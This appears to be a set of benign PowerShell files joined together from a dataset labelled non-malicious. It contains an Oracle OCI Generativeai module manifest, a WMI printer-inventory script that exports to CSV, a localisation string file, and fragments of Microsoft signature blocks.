# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
# Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr
# /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw
# EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN
# aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp
# Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB
# BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO
# MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEID1Mqza5tAeqV+fcrxQW7FqL
# GEK+2v2q+z5VJXgnv1isMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A
# cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB
# BQAEggEAY37DPT9orb3+Ki/IlixXhFLG74ggLrTNPNcmL0bcadVEPgNtk+q8LXsk
# zgwYrfKStdoWyG4hyLn7c+u8SPADBMNrXXyBskKsQywyQH8OfwjfgEsxnZlnO1u8
# hQeoO5aF7g5fWtnnmJJWP8IGIFb5PzYEOSS1Qaymuc9awL6Lt3rkfAjoQ/H9UNJy
# aDK7D+l/YrVXlDINqsSuQx9E8gaL9FvtRA6JeCkZ1MOW1tyX42A7BXIbMtGsPu6F
# p4qNa0Lx8iiI2Tw4rNgmknO2sLtC0R8Bwgf2qqoAhKiaZp6TJb6BgaGRF+cgyZcj
# nTnj9rTZxnxiITiFEpZdp8IeDcEk6aGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC
# FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq
# hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCBtQI7IgHsIqufTzGdHGDzRn0vuI0VRXPka/VGnm8BOfwIGZh/SmZXW
# GBMyMDI0MDQyMzE0MTExNy41MDZaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
# OjNCRDQtNEI4MC02OUMzMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
# ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJ
# KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx
# MDEyMTkwNzM1WhcNMjUwMTEwMTkwNzM1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0LTRC
# ODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKl74Drau2O6LLrJO3HyTvO9
# aXai//eNyP5MLWZrmUGNOJMPwMI08V9zBfRPNcucreIYSyJHjkMIUGmuh0rPV5/2
# +UCLGrN1P77n9fq/mdzXMN1FzqaPHdKElKneJQ8R6cP4dru2Gymmt1rrGcNe800C
# cD6d/Ndoommkd196VqOtjZFA1XWu+GsFBeWHiez/PllqcM/eWntkQMs0lK0zmCfH
# +Bu7i1h+FDRR8F7WzUr/7M3jhVdPpAfq2zYCA8ZVLNgEizY+vFmgx+zDuuU/GChD
# K7klDcCw+/gVoEuSOl5clQsydWQjJJX7Z2yV+1KC6G1JVqpP3dpKPAP/4udNqpR5
# HIeb8Ta1JfjRUzSv3qSje5y9RYT/AjWNYQ7gsezuDWM/8cZ11kco1JvUyOQ8x/JD
# kMFqSRwj1v+mc6LKKlj//dWCG/Hw9ppdlWJX6psDesQuQR7FV7eCqV/lfajoLpPN
# x/9zF1dv8yXBdzmWJPeCie2XaQnrAKDqlG3zXux9tNQmz2L96TdxnIO2OGmYxBAA
# ZAWoKbmtYI+Ciz4CYyO0Fm5Z3T40a5d7KJuftF6CToccc/Up/jpFfQitLfjd71cS
# +cLCeoQ+q0n0IALvV+acbENouSOrjv/QtY4FIjHlI5zdJzJnGskVJ5ozhji0YRsc
# v1WwJFAuyyCMQvLdmPddAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU3/+fh7tNczEi
# fEXlCQgFOXgMh6owHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD
# VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG
# CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw
# MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD
# CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBADP6whOFjD1ad8Gk
# EJ9oLBuvfjndMyGQ9R4HgBKSlPt3pa0XVLcimrJlDnKGgFBiWwI6XOgw82hdolDi
# MDBLLWRMTJHWVeUY1gU4XB8OOIxBc9/Q83zb1c0RWEupgC48I+b+2x2VNgGJUsQI
# yPR2PiXQhT5PyerMgag9OSodQjFwpNdGirna2rpV23EUwFeO5+3oSX4JeCNZvgyU
# OzKpyMvqVaubo+Glf/psfW5tIcMjZVt0elswfq0qJNQgoYipbaTvv7xmixUJGTbi
# xYifTwAivPcKNdeisZmtts7OHbAM795ZvKLSEqXiRUjDYZyeHyAysMEALbIhdXgH
# Eh60KoZyzlBXz3VxEirE7nhucNwM2tViOlwI7EkeU5hudctnXCG55JuMw/wb7c71
# RKimZA/KXlWpmBvkJkB0BZES8OCGDd+zY/T9BnTp8si36Tql84VfpYe9iHmy7Pqq
# xqMF2Cn4q2a0mEMnpBruDGE/gR9c8SVJ2ntkARy5SfluuJ/MB61yRvT1mUx3lypp
# O22ePjBjnwoEvVxbDjT1jhdMNdevOuDeJGzRLK9HNmTDC+TdZQlj+VMgIm8ZeEIR
# NF0oaviF+QZcUZLWzWbYq6yDok8EZKFiRR5otBoGLvaYFpxBZUE8mnLKuDlYobjr
# xh7lnwrxV/fMy0F9fSo2JxFmtLgtMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ
# mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
# WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB
# BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK
# NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg
# fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp
# rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d
# vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9
# 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR
# Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu
# qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
# ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb
# oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
# bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t
# AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW
# BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb
# UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz
# aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku
# aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA
# QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2
# VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu
# bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
# LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93
# d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
# MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q
# XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6
# U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt
# I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis
# 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp
# kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0
# sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e
# W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ
# sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
# Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0
# dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
# tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh
# bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoz
# QkQ0LTRCODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
# dmljZaIjCgEBMAcGBSsOAwIaAxUA942iGuYFrsE4wzWDd85EpM6RiwqggYMwgYCk
# fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
# AOnSOXkwIhgPMjAyNDA0MjMyMTQzMjFaGA8yMDI0MDQyNDIxNDMyMVowdDA6Bgor
# BgEEAYRZCgQBMSwwKjAKAgUA6dI5eQIBADAHAgEAAgIZ+zAHAgEAAgISnDAKAgUA
# 6dOK+QIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID
# B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAJGKR1qJKl/+mW5U2h2l
# 4liBeGpbziNYtKnpBCMp30HYhdVKFaph0TxsBGaJLYLrQ2S7wBX5JVFvTKnTyYze
# pJcgAC9YkIJt78a/e5HdsTiqydcnvbuRwlJYowGhvrnT/TnMW2q5bQi5U7jdx4Q9
# DCXm0Ao6uid4NKGA32H0Rji2MYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt
# U3RhbXAgUENBIDIwMTACEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJYIZIAWUDBAIB
# BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx
# IgQgp+zDE8w5BkLNiIOUg8zQQbwXYWEDEEHJ3CdoAGSb/FUwgfoGCyqGSIb3DQEJ
# EAIvMYHqMIHnMIHkMIG9BCAVqdP//qjxGFhe2YboEXeb8I/pAof01CwhbxUH9U69
# 7TCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB5Y9q
# wPM9tAujAAEAAAHlMCIEILE/ZDCz6TZPcDPgj4ZgWNKXRgchnitzlVyga3nqoA2P
# MA0GCSqGSIb3DQEBCwUABIICAA1YiBDKyyUcONypmkDFR9kkqouYNFNlp9qeLUXM
# O5cMzyo+/75XAA5EHmebaudbuLojtImP93dcdrgSdZjV0Xaj8OrL+mIcDCN4+LqI
# v8S3bhXmpFQeWPZsnZAOXtQ7gycHz/Psy3X3e2JKTg5/apxtQ8T7P2jYrZmpJoxa
# dP7Tsk3vG2tCdvjPKp8+n+CtMvZ4a2RSjXu86Thsrko093FNpR0sy/nTYCufc42G
# WoTfcqjamPk0d9befVsOeFFQeAqsWPFOdIzl+6B67xHZoY4zwrV8Q2epeIOViM80
# 61jbucGls9Q6B/qoVVy4X96atA8PSKdTpPr7bngJbjPhGhCga/68K6wNCEpPDnDB
# DlDYSdGy1GElO3VEIr1xoqOxx/EWviQSxkICnZRgJYos4mRgLRDsvB0T95jAmX/G
# Xju/c/m6hzF11HBRw00673ZokYvmOdBjGbEiXMHofypLQTGVwPILj+l6uAA5fVvx
# PJe/jGxy8D0u0NmnmYmUDB7DEfgFjWDiOb2rktguypGKd49Q96gCq4IlbcyhscGp
# pQaW0AMebi7RCv1J9UkOkw6NuYFfbMAog/HZPRGjcFbJ7ZHnPI0esm63eahQqOIi
# bUX+O1cb1bYRSHujTUGccOQBE+IUNCBiS8GRvoH1nQKOoeQOJh11VmNUXx8H8fTm
# 6Xj/
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_59_16.ps1
|
sample_59_16.ps1
|
#
# Module manifest for module 'OCI.PSModules.Generativeai'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Generativeai.dll'
# Version number of this module.
ModuleVersion = '87.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '88627585-5bbc-41e3-a1a5-15e5194ce97a'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Generativeai Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '87.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Generativeai.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIGenerativeaiDedicatedAiCluster',
'Get-OCIGenerativeaiDedicatedAiClustersList',
'Get-OCIGenerativeaiEndpoint', 'Get-OCIGenerativeaiEndpointsList',
'Get-OCIGenerativeaiModel', 'Get-OCIGenerativeaiModelsList',
'Get-OCIGenerativeaiWorkRequest',
'Get-OCIGenerativeaiWorkRequestErrorsList',
'Get-OCIGenerativeaiWorkRequestLogsList',
'Get-OCIGenerativeaiWorkRequestsList',
'Move-OCIGenerativeaiDedicatedAiClusterCompartment',
'Move-OCIGenerativeaiEndpointCompartment',
'Move-OCIGenerativeaiModelCompartment',
'New-OCIGenerativeaiDedicatedAiCluster',
'New-OCIGenerativeaiEndpoint', 'New-OCIGenerativeaiModel',
'Remove-OCIGenerativeaiDedicatedAiCluster',
'Remove-OCIGenerativeaiEndpoint', 'Remove-OCIGenerativeaiModel',
'Update-OCIGenerativeaiDedicatedAiCluster',
'Update-OCIGenerativeaiEndpoint', 'Update-OCIGenerativeaiModel'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Generativeai'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/Get-PrinterInfo_1.ps1
|
Get-PrinterInfo_1.ps1
|
$strComputer = "PrinterName"
$Ports = get-wmiobject -class "win32_tcpipprinterport" -namespace "root\\CIMV2" -computername $strComputer
$Printers = get-wmiobject -class "Win32_Printer" -namespace "root\\CIMV2" -computername $strComputer
$ports | Select-Object Name,Hostaddress | Set-Variable port
$Printers | Select-Object Name,PortName,DriverName,location,Description | Set-Variable print
$num = 0
$hash = @{}
do {
$hash.Add($port.name[$num], $port.hostaddress[$num])
$num = $num + 1
} until ($num -eq $ports.Count)
# Creates Table
$table = New-Object system.Data.DataTable “$PrinterInfo”
$colName = New-Object system.Data.DataColumn PrinterName,([string])
$colIP = New-Object system.Data.DataColumn IP,([string])
$colDrive = New-Object system.Data.DataColumn DriverName,([string])
$colLoc = New-Object system.Data.DataColumn location,([string])
$colDesc = New-Object system.Data.DataColumn Description,([string])
$table.columns.add($colName)
$table.columns.add($colIP)
$table.columns.add($colDrive)
$table.columns.add($colLoc)
$table.columns.add($colDesc)
$num = 0
Do {
$row = $table.NewRow()
$row.PrinterName = $printers.name[$num]
$row.IP = $hash.get_item($printers.PortName[$num])
$row.DriverName = $printers.drivername[$num]
$row.Location = $printers.Location[$num]
$row.Description = $printers.Description[$num]
$table.Rows.Add($row)
$num = $num + 1
} until ($num -eq $printers.Count)
$table | Select-Object PrinterName,IP,DriverName,Location,Description | Export-Csv C:\\Printers.csv
|
combined_dataset/train/non-malicious/sample_10_70.ps1
|
sample_10_70.ps1
|
ConvertFrom-StringData @'
id_clusterdependencyreport=Cluster resource dependency report
id_clusterdependencyreportdesc1=Obtaining cluster resource dependency report
id_clusterdependencyreportdesc=Obtaining cluster resource dependency report from group %GroupName%
'@
# SIG # Begin signature block
# MIIoUgYJKoZIhvcNAQcCoIIoQzCCKD8CAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDX84ypwX9CpeTj
# WGHsbvyfRHJaPuGRmPzpN7q0QNbGcaCCDYUwggYDMIID66ADAgECAhMzAAAEA73V
# lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV
# LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY
# oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi
# kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/
# /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv
# ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r
# EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV
# NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC
# rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos
# oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB
# +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO
# raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+
# sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W
# +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s
# IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu
# iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
